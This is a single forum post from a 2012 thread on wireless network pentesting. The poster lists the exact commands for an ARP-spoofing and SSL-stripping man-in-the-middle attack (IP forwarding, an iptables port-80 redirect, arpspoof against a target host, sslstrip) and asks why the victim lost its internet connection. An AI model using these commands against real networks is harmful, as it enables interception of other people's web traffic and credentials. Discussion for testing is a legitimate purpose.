Thread
:
[Tutorial] Pentesting Wireless Networks
View Single Post
q6600
2012-01-29 , 22:38
Posts: 146 | Thanked: 39 times | Joined on May 2010
#
177
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
sslstrip -l 333
No luck...
I can not open no pages ( chrome, firefox) no internet ...
ps
try as well 8080 still no luck
Quote & Reply
|
q6600
View Public Profile
Send a private message to q6600
Find all posts by q6600